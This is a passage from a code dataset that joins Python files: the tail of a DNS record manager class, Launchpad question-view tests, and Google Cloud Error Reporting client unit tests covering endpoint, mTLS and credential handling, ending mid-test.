"""Delete a resource record by its ID.
:param integer id: the record's ID
"""
self.record.deleteObject(id=record_id)
def get_record(self, record_id):
"""Get a DNS record.
:param integer id: the record's ID
"""
return self.record.getObject(id=record_id)
def get_records(self, zone_id, ttl=None, data=None, host=None,
record_type=None):
"""List, and optionally filter, records within a zone.
:param zone: the zone name in which to search.
:param int ttl: time in seconds
:param str data: the records data
:param str host: record's host
:param str record_type: the type of record
:returns: A list of dictionaries representing the matching records
within the specified zone.
"""
_filter = utils.NestedDict()
if ttl:
_filter['resourceRecords']['ttl'] = utils.query_filter(ttl)
if host:
_filter['resourceRecords']['host'] = utils.query_filter(host)
if data:
_filter['resourceRecords']['data'] = utils.query_filter(data)
if record_type:
_filter['resourceRecords']['type'] = utils.query_filter(
record_type.lower())
results = self.service.getResourceRecords(
id=zone_id,
mask='id,expire,domainId,host,minimum,refresh,retry,'
'mxPriority,ttl,type,data,responsiblePerson',
filter=_filter.to_dict(),
)
return results
def edit_record(self, record):
"""Update an existing record with the options provided.
The provided dict must include an 'id' key and value corresponding to
the record that should be updated.
:param dict record: the record to update
"""
self.record.editObject(record, id=record['id'])
def dump_zone(self, zone_id):
"""Retrieve a zone dump in BIND format.
:param integer id: The zone ID to dump
"""
return self.service.getZoneFileContents(id=zone_id)
| mit | 1,036,015,339,823,414,800 | 33.628692 | 102 | 0.60156 | false |
abramhindle/UnnaturalCodeFork | python/testdata/launchpad/lib/lp/answers/browser/tests/test_question.py | 1 | 6315 | # Copyright 2010 Canonical Ltd. This software is licensed under the
# GNU Affero General Public License version 3 (see the file LICENSE).
"""Tests for the question module."""
__metaclass__ = type
__all__ = []
from zope.security.proxy import removeSecurityProxy
from lp.answers.browser.question import QuestionTargetWidget
from lp.answers.interfaces.question import IQuestion
from lp.answers.publisher import AnswersLayer
from lp.app.enums import ServiceUsage
from lp.services.webapp.servers import LaunchpadTestRequest
from lp.testing import (
login_person,
logout,
person_logged_in,
TestCaseWithFactory,
)
from lp.testing.layers import DatabaseFunctionalLayer
from lp.testing.views import create_initialized_view
class TestQuestionAddView(TestCaseWithFactory):
"""Verify the behavior of the QuestionAddView."""
layer = DatabaseFunctionalLayer
def setUp(self):
super(TestQuestionAddView, self).setUp()
self.question_target = self.factory.makeProduct()
self.user = self.factory.makePerson()
login_person(self.user)
def getSearchForm(self, title, language='en'):
return {
'field.title': title,
'field.language': language,
'field.actions.continue': 'Continue',
}
def test_question_title_within_max_display_width(self):
# Titles (summary in the view) less than 250 characters are accepted.
form = self.getSearchForm('123456789 ' * 10)
view = create_initialized_view(
self.question_target, name='+addquestion', layer=AnswersLayer,
form=form, principal=self.user)
self.assertEqual([], view.errors)
def test_question_title_exceeds_max_display_width(self):
# Titles (summary in the view) cannot exceed 250 characters.
form = self.getSearchForm('123456789 ' * 26)
view = create_initialized_view(
self.question_target, name='+addquestion', layer=AnswersLayer,
form=form, principal=self.user)
self.assertEqual(1, len(view.errors))
self.assertEqual(
'The summary cannot exceed 250 characters.', view.errors[0])
def test_context_uses_answers(self):
# If a target doesn't use answers, it doesn't provide the form.
#logout()
owner = removeSecurityProxy(self.question_target).owner
with person_logged_in(owner):
self.question_target.answers_usage = ServiceUsage.NOT_APPLICABLE
login_person(self.user)
view = create_initialized_view(
self.question_target, name='+addquestion', layer=AnswersLayer,
principal=self.user)
self.assertFalse(view.context_uses_answers)
contents = view.render()
msg = "<strong>does not use</strong> Launchpad as its answer forum"
self.assertIn(msg, contents)
class QuestionEditViewTestCase(TestCaseWithFactory):
"""Verify the behavior of the QuestionEditView."""
layer = DatabaseFunctionalLayer
def getForm(self, question):
if question.assignee is None:
assignee = ''
else:
assignee = question.assignee.name
return {
'field.title': question.title,
'field.description': question.description,
'field.language': question.language.code,
'field.assignee': assignee,
'field.target': 'product',
'field.target.distribution': '',
'field.target.package': '',
'field.target.product': question.target.name,
'field.whiteboard': question.whiteboard,
'field.actions.change': 'Change',
}
def test_retarget_with_other_changed(self):
# Retargeting must be the last change made to the question
# to ensure that user permission do not change while there
# are more changes to make.
target = self.factory.makeProduct()
question = self.factory.makeQuestion(target=target)
other_target = self.factory.makeProduct()
login_person(target.owner)
form = self.getForm(question)
form['field.whiteboard'] = 'comment'
form['field.target.product'] = other_target.name
view = create_initialized_view(
question, name='+edit', layer=AnswersLayer, form=form)
self.assertEqual([], view.errors)
self.assertEqual(other_target, question.target)
self.assertEqual('comment', question.whiteboard)
class QuestionTargetWidgetTestCase(TestCaseWithFactory):
"""Test that QuestionTargetWidgetTestCase behaves as expected."""
layer = DatabaseFunctionalLayer
def getWidget(self, question):
field = IQuestion['target']
bound_field = field.bind(question)
request = LaunchpadTestRequest()
return QuestionTargetWidget(bound_field, request)
def test_getDistributionVocabulary_with_product_question(self):
# The vocabulary does not contain distros that do not use
# launchpad to track answers.
distribution = self.factory.makeDistribution()
product = self.factory.makeProduct()
question = self.factory.makeQuestion(target=product)
target_widget = self.getWidget(question)
vocabulary = target_widget.getDistributionVocabulary()
self.assertEqual(None, vocabulary.distribution)
self.assertFalse(
distribution in vocabulary,
"Vocabulary contains distros that do not use Launchpad Answers.")
def test_getDistributionVocabulary_with_distribution_question(self):
# The vocabulary does not contain distros that do not use
# launchpad to track answers.
distribution = self.factory.makeDistribution()
other_distribution = self.factory.makeDistribution()
question = self.factory.makeQuestion(target=distribution)
target_widget = self.getWidget(question)
vocabulary = target_widget.getDistributionVocabulary()
self.assertEqual(distribution, vocabulary.distribution)
self.assertTrue(
distribution in vocabulary,
"Vocabulary missing context distribution.")
self.assertFalse(
other_distribution in vocabulary,
"Vocabulary contains distros that do not use Launchpad Answers.")
| agpl-3.0 | 8,673,996,265,418,779,000 | 39.480769 | 77 | 0.67015 | false |
googleapis/googleapis-gen | google/devtools/clouderrorreporting/v1beta1/devtools-clouderrorreporting-v1beta1-py/tests/unit/gapic/errorreporting_v1beta1/test_report_errors_service.py | 1 | 48720 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import mock
import packaging.version
import grpc
from grpc.experimental import aio
import math
import pytest
from proto.marshal.rules.dates import DurationRule, TimestampRule
from google.api_core import client_options
from google.api_core import exceptions as core_exceptions
from google.api_core import gapic_v1
from google.api_core import grpc_helpers
from google.api_core import grpc_helpers_async
from google.auth import credentials as ga_credentials
from google.auth.exceptions import MutualTLSChannelError
from google.cloud.errorreporting_v1beta1.services.report_errors_service import ReportErrorsServiceAsyncClient
from google.cloud.errorreporting_v1beta1.services.report_errors_service import ReportErrorsServiceClient
from google.cloud.errorreporting_v1beta1.services.report_errors_service import transports
from google.cloud.errorreporting_v1beta1.services.report_errors_service.transports.base import _GOOGLE_AUTH_VERSION
from google.cloud.errorreporting_v1beta1.types import common
from google.cloud.errorreporting_v1beta1.types import report_errors_service
from google.oauth2 import service_account
from google.protobuf import timestamp_pb2 # type: ignore
import google.auth
# TODO(busunkim): Once google-auth >= 1.25.0 is required transitively
# through google-api-core:
# - Delete the auth "less than" test cases
# - Delete these pytest markers (Make the "greater than or equal to" tests the default).
requires_google_auth_lt_1_25_0 = pytest.mark.skipif(
packaging.version.parse(_GOOGLE_AUTH_VERSION) >= packaging.version.parse("1.25.0"),
reason="This test requires google-auth < 1.25.0",
)
requires_google_auth_gte_1_25_0 = pytest.mark.skipif(
packaging.version.parse(_GOOGLE_AUTH_VERSION) < packaging.version.parse("1.25.0"),
reason="This test requires google-auth >= 1.25.0",
)
def client_cert_source_callback():
return b"cert bytes", b"key bytes"
# If default endpoint is localhost, then default mtls endpoint will be the same.
# This method modifies the default endpoint so the client can produce a different
# mtls endpoint for endpoint testing purposes.
def modify_default_endpoint(client):
return "foo.googleapis.com" if ("localhost" in client.DEFAULT_ENDPOINT) else client.DEFAULT_ENDPOINT
def test__get_default_mtls_endpoint():
api_endpoint = "example.googleapis.com"
api_mtls_endpoint = "example.mtls.googleapis.com"
sandbox_endpoint = "example.sandbox.googleapis.com"
sandbox_mtls_endpoint = "example.mtls.sandbox.googleapis.com"
non_googleapi = "api.example.com"
assert ReportErrorsServiceClient._get_default_mtls_endpoint(None) is None
assert ReportErrorsServiceClient._get_default_mtls_endpoint(api_endpoint) == api_mtls_endpoint
assert ReportErrorsServiceClient._get_default_mtls_endpoint(api_mtls_endpoint) == api_mtls_endpoint
assert ReportErrorsServiceClient._get_default_mtls_endpoint(sandbox_endpoint) == sandbox_mtls_endpoint
assert ReportErrorsServiceClient._get_default_mtls_endpoint(sandbox_mtls_endpoint) == sandbox_mtls_endpoint
assert ReportErrorsServiceClient._get_default_mtls_endpoint(non_googleapi) == non_googleapi
@pytest.mark.parametrize("client_class", [
ReportErrorsServiceClient,
ReportErrorsServiceAsyncClient,
])
def test_report_errors_service_client_from_service_account_info(client_class):
creds = ga_credentials.AnonymousCredentials()
with mock.patch.object(service_account.Credentials, 'from_service_account_info') as factory:
factory.return_value = creds
info = {"valid": True}
client = client_class.from_service_account_info(info)
assert client.transport._credentials == creds
assert isinstance(client, client_class)
assert client.transport._host == 'clouderrorreporting.googleapis.com:443'
@pytest.mark.parametrize("client_class", [
ReportErrorsServiceClient,
ReportErrorsServiceAsyncClient,
])
def test_report_errors_service_client_service_account_always_use_jwt(client_class):
with mock.patch.object(service_account.Credentials, 'with_always_use_jwt_access', create=True) as use_jwt:
creds = service_account.Credentials(None, None, None)
client = client_class(credentials=creds)
use_jwt.assert_not_called()
@pytest.mark.parametrize("transport_class,transport_name", [
(transports.ReportErrorsServiceGrpcTransport, "grpc"),
(transports.ReportErrorsServiceGrpcAsyncIOTransport, "grpc_asyncio"),
])
def test_report_errors_service_client_service_account_always_use_jwt_true(transport_class, transport_name):
with mock.patch.object(service_account.Credentials, 'with_always_use_jwt_access', create=True) as use_jwt:
creds = service_account.Credentials(None, None, None)
transport = transport_class(credentials=creds, always_use_jwt_access=True)
use_jwt.assert_called_once_with(True)
@pytest.mark.parametrize("client_class", [
ReportErrorsServiceClient,
ReportErrorsServiceAsyncClient,
])
def test_report_errors_service_client_from_service_account_file(client_class):
creds = ga_credentials.AnonymousCredentials()
with mock.patch.object(service_account.Credentials, 'from_service_account_file') as factory:
factory.return_value = creds
client = client_class.from_service_account_file("dummy/file/path.json")
assert client.transport._credentials == creds
assert isinstance(client, client_class)
client = client_class.from_service_account_json("dummy/file/path.json")
assert client.transport._credentials == creds
assert isinstance(client, client_class)
assert client.transport._host == 'clouderrorreporting.googleapis.com:443'
def test_report_errors_service_client_get_transport_class():
transport = ReportErrorsServiceClient.get_transport_class()
available_transports = [
transports.ReportErrorsServiceGrpcTransport,
]
assert transport in available_transports
transport = ReportErrorsServiceClient.get_transport_class("grpc")
assert transport == transports.ReportErrorsServiceGrpcTransport
@pytest.mark.parametrize("client_class,transport_class,transport_name", [
(ReportErrorsServiceClient, transports.ReportErrorsServiceGrpcTransport, "grpc"),
(ReportErrorsServiceAsyncClient, transports.ReportErrorsServiceGrpcAsyncIOTransport, "grpc_asyncio"),
])
@mock.patch.object(ReportErrorsServiceClient, "DEFAULT_ENDPOINT", modify_default_endpoint(ReportErrorsServiceClient))
@mock.patch.object(ReportErrorsServiceAsyncClient, "DEFAULT_ENDPOINT", modify_default_endpoint(ReportErrorsServiceAsyncClient))
def test_report_errors_service_client_client_options(client_class, transport_class, transport_name):
# Check that if channel is provided we won't create a new one.
with mock.patch.object(ReportErrorsServiceClient, 'get_transport_class') as gtc:
transport = transport_class(
credentials=ga_credentials.AnonymousCredentials()
)
client = client_class(transport=transport)
gtc.assert_not_called()
# Check that if channel is provided via str we will create a new one.
with mock.patch.object(ReportErrorsServiceClient, 'get_transport_class') as gtc:
client = client_class(transport=transport_name)
gtc.assert_called()
# Check the case api_endpoint is provided.
options = client_options.ClientOptions(api_endpoint="squid.clam.whelk")
with mock.patch.object(transport_class, '__init__') as patched:
patched.return_value = None
client = client_class(client_options=options)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host="squid.clam.whelk",
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT is
# "never".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "never"}):
with mock.patch.object(transport_class, '__init__') as patched:
patched.return_value = None
client = client_class()
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT is
# "always".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "always"}):
with mock.patch.object(transport_class, '__init__') as patched:
patched.return_value = None
client = client_class()
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_MTLS_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT has
# unsupported value.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "Unsupported"}):
with pytest.raises(MutualTLSChannelError):
client = client_class()
# Check the case GOOGLE_API_USE_CLIENT_CERTIFICATE has unsupported value.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "Unsupported"}):
with pytest.raises(ValueError):
client = client_class()
# Check the case quota_project_id is provided
options = client_options.ClientOptions(quota_project_id="octopus")
with mock.patch.object(transport_class, '__init__') as patched:
patched.return_value = None
client = client_class(client_options=options)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id="octopus",
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
@pytest.mark.parametrize("client_class,transport_class,transport_name,use_client_cert_env", [
(ReportErrorsServiceClient, transports.ReportErrorsServiceGrpcTransport, "grpc", "true"),
(ReportErrorsServiceAsyncClient, transports.ReportErrorsServiceGrpcAsyncIOTransport, "grpc_asyncio", "true"),
(ReportErrorsServiceClient, transports.ReportErrorsServiceGrpcTransport, "grpc", "false"),
(ReportErrorsServiceAsyncClient, transports.ReportErrorsServiceGrpcAsyncIOTransport, "grpc_asyncio", "false"),
])
@mock.patch.object(ReportErrorsServiceClient, "DEFAULT_ENDPOINT", modify_default_endpoint(ReportErrorsServiceClient))
@mock.patch.object(ReportErrorsServiceAsyncClient, "DEFAULT_ENDPOINT", modify_default_endpoint(ReportErrorsServiceAsyncClient))
@mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "auto"})
def test_report_errors_service_client_mtls_env_auto(client_class, transport_class, transport_name, use_client_cert_env):
# This tests the endpoint autoswitch behavior. Endpoint is autoswitched to the default
# mtls endpoint, if GOOGLE_API_USE_CLIENT_CERTIFICATE is "true" and client cert exists.
# Check the case client_cert_source is provided. Whether client cert is used depends on
# GOOGLE_API_USE_CLIENT_CERTIFICATE value.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}):
options = client_options.ClientOptions(client_cert_source=client_cert_source_callback)
with mock.patch.object(transport_class, '__init__') as patched:
patched.return_value = None
client = client_class(client_options=options)
if use_client_cert_env == "false":
expected_client_cert_source = None
expected_host = client.DEFAULT_ENDPOINT
else:
expected_client_cert_source = client_cert_source_callback
expected_host = client.DEFAULT_MTLS_ENDPOINT
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=expected_host,
scopes=None,
client_cert_source_for_mtls=expected_client_cert_source,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
# Check the case ADC client cert is provided. Whether client cert is used depends on
# GOOGLE_API_USE_CLIENT_CERTIFICATE value.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}):
with mock.patch.object(transport_class, '__init__') as patched:
with mock.patch('google.auth.transport.mtls.has_default_client_cert_source', return_value=True):
with mock.patch('google.auth.transport.mtls.default_client_cert_source', return_value=client_cert_source_callback):
if use_client_cert_env == "false":
expected_host = client.DEFAULT_ENDPOINT
expected_client_cert_source = None
else:
expected_host = client.DEFAULT_MTLS_ENDPOINT
expected_client_cert_source = client_cert_source_callback
patched.return_value = None
client = client_class()
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=expected_host,
scopes=None,
client_cert_source_for_mtls=expected_client_cert_source,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
# Check the case client_cert_source and ADC client cert are not provided.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}):
with mock.patch.object(transport_class, '__init__') as patched:
with mock.patch("google.auth.transport.mtls.has_default_client_cert_source", return_value=False):
patched.return_value = None
client = client_class()
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
@pytest.mark.parametrize("client_class,transport_class,transport_name", [
(ReportErrorsServiceClient, transports.ReportErrorsServiceGrpcTransport, "grpc"),
(ReportErrorsServiceAsyncClient, transports.ReportErrorsServiceGrpcAsyncIOTransport, "grpc_asyncio"),
])
def test_report_errors_service_client_client_options_scopes(client_class, transport_class, transport_name):
# Check the case scopes are provided.
options = client_options.ClientOptions(
scopes=["1", "2"],
)
with mock.patch.object(transport_class, '__init__') as patched:
patched.return_value = None
client = client_class(client_options=options)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=["1", "2"],
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
@pytest.mark.parametrize("client_class,transport_class,transport_name", [
(ReportErrorsServiceClient, transports.ReportErrorsServiceGrpcTransport, "grpc"),
(ReportErrorsServiceAsyncClient, transports.ReportErrorsServiceGrpcAsyncIOTransport, "grpc_asyncio"),
])
def test_report_errors_service_client_client_options_credentials_file(client_class, transport_class, transport_name):
# Check the case credentials file is provided.
options = client_options.ClientOptions(
credentials_file="credentials.json"
)
with mock.patch.object(transport_class, '__init__') as patched:
patched.return_value = None
client = client_class(client_options=options)
patched.assert_called_once_with(
credentials=None,
credentials_file="credentials.json",
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
def test_report_errors_service_client_client_options_from_dict():
with mock.patch('google.cloud.errorreporting_v1beta1.services.report_errors_service.transports.ReportErrorsServiceGrpcTransport.__init__') as grpc_transport:
grpc_transport.return_value = None
client = ReportErrorsServiceClient(
client_options={'api_endpoint': 'squid.clam.whelk'}
)
grpc_transport.assert_called_once_with(
credentials=None,
credentials_file=None,
host="squid.clam.whelk",
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
def test_report_error_event(transport: str = 'grpc', request_type=report_errors_service.ReportErrorEventRequest):
client = ReportErrorsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.report_error_event),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = report_errors_service.ReportErrorEventResponse(
)
response = client.report_error_event(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == report_errors_service.ReportErrorEventRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, report_errors_service.ReportErrorEventResponse)
def test_report_error_event_from_dict():
test_report_error_event(request_type=dict)
def test_report_error_event_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = ReportErrorsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport='grpc',
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.report_error_event),
'__call__') as call:
client.report_error_event()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == report_errors_service.ReportErrorEventRequest()
@pytest.mark.asyncio
async def test_report_error_event_async(transport: str = 'grpc_asyncio', request_type=report_errors_service.ReportErrorEventRequest):
client = ReportErrorsServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.report_error_event),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value =grpc_helpers_async.FakeUnaryUnaryCall(report_errors_service.ReportErrorEventResponse(
))
response = await client.report_error_event(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == report_errors_service.ReportErrorEventRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, report_errors_service.ReportErrorEventResponse)
@pytest.mark.asyncio
async def test_report_error_event_async_from_dict():
await test_report_error_event_async(request_type=dict)
def test_report_error_event_field_headers():
client = ReportErrorsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = report_errors_service.ReportErrorEventRequest()
request.project_name = 'project_name/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.report_error_event),
'__call__') as call:
call.return_value = report_errors_service.ReportErrorEventResponse()
client.report_error_event(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'project_name=project_name/value',
) in kw['metadata']
@pytest.mark.asyncio
async def test_report_error_event_field_headers_async():
client = ReportErrorsServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = report_errors_service.ReportErrorEventRequest()
request.project_name = 'project_name/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.report_error_event),
'__call__') as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(report_errors_service.ReportErrorEventResponse())
await client.report_error_event(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'project_name=project_name/value',
) in kw['metadata']
def test_report_error_event_flattened():
client = ReportErrorsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.report_error_event),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = report_errors_service.ReportErrorEventResponse()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.report_error_event(
project_name='project_name_value',
event=report_errors_service.ReportedErrorEvent(event_time=timestamp_pb2.Timestamp(seconds=751)),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].project_name == 'project_name_value'
assert args[0].event == report_errors_service.ReportedErrorEvent(event_time=timestamp_pb2.Timestamp(seconds=751))
def test_report_error_event_flattened_error():
client = ReportErrorsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.report_error_event(
report_errors_service.ReportErrorEventRequest(),
project_name='project_name_value',
event=report_errors_service.ReportedErrorEvent(event_time=timestamp_pb2.Timestamp(seconds=751)),
)
@pytest.mark.asyncio
async def test_report_error_event_flattened_async():
client = ReportErrorsServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.report_error_event),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = report_errors_service.ReportErrorEventResponse()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(report_errors_service.ReportErrorEventResponse())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.report_error_event(
project_name='project_name_value',
event=report_errors_service.ReportedErrorEvent(event_time=timestamp_pb2.Timestamp(seconds=751)),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].project_name == 'project_name_value'
assert args[0].event == report_errors_service.ReportedErrorEvent(event_time=timestamp_pb2.Timestamp(seconds=751))
@pytest.mark.asyncio
async def test_report_error_event_flattened_error_async():
client = ReportErrorsServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.report_error_event(
report_errors_service.ReportErrorEventRequest(),
project_name='project_name_value',
event=report_errors_service.ReportedErrorEvent(event_time=timestamp_pb2.Timestamp(seconds=751)),
)
def test_credentials_transport_error():
# It is an error to provide credentials and a transport instance.
transport = transports.ReportErrorsServiceGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = ReportErrorsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# It is an error to provide a credentials file and a transport instance.
transport = transports.ReportErrorsServiceGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = ReportErrorsServiceClient(
client_options={"credentials_file": "credentials.json"},
transport=transport,
)
# It is an error to provide scopes and a transport instance.
transport = transports.ReportErrorsServiceGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = ReportErrorsServiceClient(
client_options={"scopes": ["1", "2"]},
transport=transport,
)
def test_transport_instance():
# A client may be instantiated with a custom transport instance.
transport = transports.ReportErrorsServiceGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
client = ReportErrorsServiceClient(transport=transport)
assert client.transport is transport
def test_transport_get_channel():
# A client may be instantiated with a custom transport instance.
transport = transports.ReportErrorsServiceGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
channel = transport.grpc_channel
assert channel
transport = transports.ReportErrorsServiceGrpcAsyncIOTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
channel = transport.grpc_channel
assert channel
@pytest.mark.parametrize("transport_class", [
transports.ReportErrorsServiceGrpcTransport,
transports.ReportErrorsServiceGrpcAsyncIOTransport,
])
def test_transport_adc(transport_class):
# Test default credentials are used if not provided.
with mock.patch.object(google.auth, 'default') as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport_class()
adc.assert_called_once()
def test_transport_grpc_default():
# A client should use the gRPC transport by default.
client = ReportErrorsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
assert isinstance(
client.transport,
transports.ReportErrorsServiceGrpcTransport,
)
def test_report_errors_service_base_transport_error():
# Passing both a credentials object and credentials_file should raise an error
with pytest.raises(core_exceptions.DuplicateCredentialArgs):
transport = transports.ReportErrorsServiceTransport(
credentials=ga_credentials.AnonymousCredentials(),
credentials_file="credentials.json"
)
def test_report_errors_service_base_transport():
# Instantiate the base transport.
with mock.patch('google.cloud.errorreporting_v1beta1.services.report_errors_service.transports.ReportErrorsServiceTransport.__init__') as Transport:
Transport.return_value = None
transport = transports.ReportErrorsServiceTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
# Every method on the transport should just blindly
# raise NotImplementedError.
methods = (
'report_error_event',
)
for method in methods:
with pytest.raises(NotImplementedError):
getattr(transport, method)(request=object())
@requires_google_auth_gte_1_25_0
def test_report_errors_service_base_transport_with_credentials_file():
# Instantiate the base transport with a credentials file
with mock.patch.object(google.auth, 'load_credentials_from_file', autospec=True) as load_creds, mock.patch('google.cloud.errorreporting_v1beta1.services.report_errors_service.transports.ReportErrorsServiceTransport._prep_wrapped_messages') as Transport:
Transport.return_value = None
load_creds.return_value = (ga_credentials.AnonymousCredentials(), None)
transport = transports.ReportErrorsServiceTransport(
credentials_file="credentials.json",
quota_project_id="octopus",
)
load_creds.assert_called_once_with("credentials.json",
scopes=None,
default_scopes=(
'https://www.googleapis.com/auth/cloud-platform',
),
quota_project_id="octopus",
)
@requires_google_auth_lt_1_25_0
def test_report_errors_service_base_transport_with_credentials_file_old_google_auth():
# Instantiate the base transport with a credentials file
with mock.patch.object(google.auth, 'load_credentials_from_file', autospec=True) as load_creds, mock.patch('google.cloud.errorreporting_v1beta1.services.report_errors_service.transports.ReportErrorsServiceTransport._prep_wrapped_messages') as Transport:
Transport.return_value = None
load_creds.return_value = (ga_credentials.AnonymousCredentials(), None)
transport = transports.ReportErrorsServiceTransport(
credentials_file="credentials.json",
quota_project_id="octopus",
)
load_creds.assert_called_once_with("credentials.json", scopes=(
'https://www.googleapis.com/auth/cloud-platform',
),
quota_project_id="octopus",
)
def test_report_errors_service_base_transport_with_adc():
# Test the default credentials are used if credentials and credentials_file are None.
